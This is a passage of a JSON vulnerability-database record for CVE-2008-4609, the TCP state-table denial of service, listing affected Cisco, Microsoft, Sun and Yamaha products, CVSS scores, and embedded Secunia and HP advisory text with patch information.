            "_id": null,
            "model": "windows vista home premium 64-bit edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 zya1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "ios 12.2xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 13",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "16.2"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "access gateway enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 91",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 scb1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10"
          },
          {
            "_id": null,
            "model": "ios 12.3tpc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ya",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3jed",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 47",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.2.10"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 64",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 irc",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "ios 12.4 jda3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 37",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 101",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows professional sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.3 bc9",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 115",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3bc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3ya",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 src3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self service voicexml",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows vista enterprise sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt140e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.5(9)"
          },
          {
            "_id": null,
            "model": "ios 12.4 md",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2srb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos 7.6",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10.3"
          },
          {
            "_id": null,
            "model": "ios 12.4 xr4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista business 64-bit edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.2(2)"
          },
          {
            "_id": null,
            "model": "linux enterprise sdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "0"
          },
          {
            "_id": null,
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home premium 64-bit edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0db",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xs",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 power/utm r65 hfa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "50"
          },
          {
            "_id": null,
            "model": "ios 12.3 bc6",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "suse linux openexchange server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ios 12.4 xq2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(8)"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "ios 12.0dc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3 jec3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.2tpc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos 8.7",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 116",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 ye",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 127",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server datacenter edition itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "bigip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "networks secure network access identity engine guest manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "ios 12.2 mc2m",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center multimedia \u0026 outbound",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "ios 12.0sx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#723308"
          },
          {
            "db": "BID",
            "id": "31545"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200810-307"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-4609"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:oracle:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:opensolaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:catos",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:ios",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:ios_xe",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:pix_asa",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:checkpoint:connectra",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:checkpoint:vpn-1_power_vsx",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:checkpoint:vpn-1_power_utm",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:checkpoint:vpn-1_pro_express",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:bluecoat:proxysg",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:bluecoat:sgos",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_2000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_server_2008",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_vista",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:microsoft:windows_xp",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt100i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt102i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt103i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt105",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt107e",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt140",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt200i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt250i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt300i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt56v",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt57i_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt58i_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt60w",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rt80i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rta50i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rta52i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rta54i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rta55i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rtv700",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rtw65b",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rtw65i",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rtx1000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rtx1100",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rtx1200",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rtx1500",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rtx2000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:rtx3000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:yamaha:srt100",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:furukawa_electric:fitelnet",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:furukawa_electric:fitelnet-f",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:furukawa_electric:mucho",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:ip38x",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Robert E. Lee and Jack C. Lewis",
        "sources": [
          {
            "db": "BID",
            "id": "31545"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200810-307"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2008-4609",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2008-4609",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-34734",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2008-4609",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#723308",
                "trust": 0.8,
                "value": "15.59"
              },
              {
                "author": "NVD",
                "id": "CVE-2008-4609",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200810-307",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-34734",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2008-4609",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#723308"
          },
          {
            "db": "VULHUB",
            "id": "VHN-34734"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-4609"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200810-307"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-4609"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. Part of the Transmission Control Protocol (TCP) specification (RFC 1122) allows a receiver to advertise a zero byte window, instructing the sender to maintain the connection but not send additional TCP payload data. The sender should then probe the receiver to check if the receiver is ready to accept data. Narrow interpretation of this part of the specification can create a denial-of-service vulnerability. By advertising a zero receive window and acknowledging probes, a malicious receiver can cause a sender to consume resources (TCP state, buffers, and application memory), preventing the targeted service or system from handling legitimate connections. Transmission Control Protocol (TCP) Multiple implementations of service disruption (DoS) Vulnerabilities exist. RFC793 It is prescribed by Transmission Control Protocol (TCP) Implementation of service disruption due to misuse of available resources after connection establishment (DoS) Vulnerabilities exist.Service operation disrupted by a remote third party (DoS) There is a possibility of being attacked. The core TCP/IP protocol is prone to multiple remote denial-of-service vulnerabilities. \nThe issues are tracked by Cisco Bug IDs CSCsv04836, CSCsv07712, CSCsv66169, CSCsv02768, CSCsv08325, and CSCsv08579. \nThese issues are reported to affect multiple vendors\u0027 implementations of the TCP/IP stack. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nWindows 2000 TCP/IP Window Size Denial of Service Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA36597\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36597/\n\nDESCRIPTION:\nTwo vulnerabilities have been reported in Microsoft Windows 2000,\nwhich can be exploited by malicious people to cause a DoS (Denial of\nService). \n\n1) An error in the TCP/IP processing can be exploited to cause a\nsystem to stop responding to new requests by flooding it using\nspecially crafted packets with a TCP receive window size set to a\nvery small value or zero. \n\n2) An error in the TCP/IP processing can be exploited to cause\nconnections to hang indefinitely in a FIN-WAIT-1 or FIN-WAIT-2 state. \nThis can be exploited to cause a system to stop responding to new\nrequests by flooding it using specially crafted packets with a TCP\nreceive window size set to a very small value or zero. \n\nSOLUTION:\nAccording to the vendor, no patches will be made available as it\nwould require re-architecting a significant amount of the OS. \n\nPROVIDED AND/OR DISCOVERED BY:\n1) The vendor credits Jack C. Louis, Outpost24. \n2) The vendor credits Felix Lindner, Recurity Labs. \n\nORIGINAL ADVISORY:\nMS09-048 (KB967723):\nhttp://www.microsoft.com/technet/security/Bulletin/MS09-048.mspx\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c01923093\nVersion: 1\n\nHPSBMI02473 SSRT080138 rev.1 - Cisco Catalyst Blade Switch 3020/3120, Remote Denial of Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2009-11-17\nLast Updated: 2009-11-17\n\nPotential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential vulnerability has been identified with the Cisco Catalyst Blade Switch 3020/3021. The vulnerability could be exploited remotely to create a Denial of Service (DoS). \n\nReferences: CVE-2008-4609, Cisco Security Advisory: TCP State Manipulation Denial of Service Vulnerabilities in Multiple Cisco Products(cisco-sa-20090908-tcp24)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nCisco Catalyst Blade Switch 3020 for c-Class BladeSystem running firmware earlier than v12.2(50)\nCisco Catalyst Blade Switch 3120G and Cisco Catalyst Blade Switch 3120X for HP running firmware earlier than v12.2(50)\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2008-4609    (AV:N/AC:M/Au:N/C:N/I:N/A:C)       7.1\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided firmware updates to resolve this vulnerability. \n\nProduct\n Firmware Version\n\nCisco Catalyst Blade Switch 3020 for c-Class BladeSystem\n 12.2(50) SE1 or subsequent\n\nCisco Catalyst Blade Switch 3120G and Cisco Catalyst Blade Switch 3120X for HP\n 12.2(50) SE1 or subsequent\n\nTo Locate the Firmware Update\n\nBrowse to http://www.hp.com and do the following:\n\nSelect \"Support \u0026 Drivers\"\nIn Step 1 select \"Download drivers and software (and firmware)\"\nIn Step 2 enter \"Cisco Catalyst Blade Switch\"\nClick on \"Go\"\nSelect the desired product\nSelect the desired Windows operating system\nClick on \"Firmware - Blade Infrastructure\"\n\nPRODUCT SPECIFIC INFORMATION\nNone\n\nHISTORY\nVersion:1 (rev.1) - 17 November 2009 Initial release\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com\n  Subject: get key\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n    -check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n    -verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin\nrelates to is represented by the 5th and 6th characters\nof the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\nCopyright 2009 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niEYEARECAAYFAksEDAMACgkQ4B86/C0qfVm87gCgliWdpIKldzOKHRvJA5r9gR4Z\nge0AoMu3ueCbIB4y3HUmT/jReUzE4jym\n=uBei\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2008-4609"
          },
          {
            "db": "CERT/CC",
            "id": "VU#723308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090"
          },
          {
            "db": "BID",
            "id": "31545"
          },
          {
            "db": "VULHUB",
            "id": "VHN-34734"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-4609"
          },
          {
            "db": "PACKETSTORM",
            "id": "81054"
          },
          {
            "db": "PACKETSTORM",
            "id": "82772"
          }
        ],
        "trust": 2.97
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-34734",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-34734"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2008-4609",
            "trust": 3.0
          },
          {
            "db": "USCERT",
            "id": "TA09-251A",
            "trust": 2.6
          },
          {
            "db": "CERT/CC",
            "id": "VU#723308",
            "trust": 2.0
          },
          {
            "db": "BID",
            "id": "31545",
            "trust": 1.2
          },
          {
            "db": "SECUNIA",
            "id": "36597",
            "trust": 0.9
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-2954",
            "trust": 0.8
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-2567",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "36802",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "36602",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "36603",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "37044",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "SA09-251A",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200810-307",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "82772",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-34734",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-4609",
            "trust": 0.1
